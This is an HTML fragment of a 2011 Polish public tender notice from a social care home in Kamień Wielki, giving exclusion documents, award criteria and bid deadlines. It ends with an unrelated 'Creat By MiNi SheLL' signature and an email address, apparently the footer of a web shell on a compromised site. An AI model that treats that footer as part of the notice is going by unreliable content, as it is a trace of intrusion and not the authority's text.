<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin płatności - 10</li>
<li>3 - Wysokość upustu na asortyment nie wymieniony w formularzu cenowym - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpskamien.powiatgorzowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Kamieniu Wielkim
ul. Stawna 40
66-460 Witnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2011 godzina 10:00, miejsce: Dom Pomocy Społecznej w Kamieniu Wielkim
ul. Stawna 40
66-460 Witnica
Sekretariat - pok. 208.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 28.02.2011.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com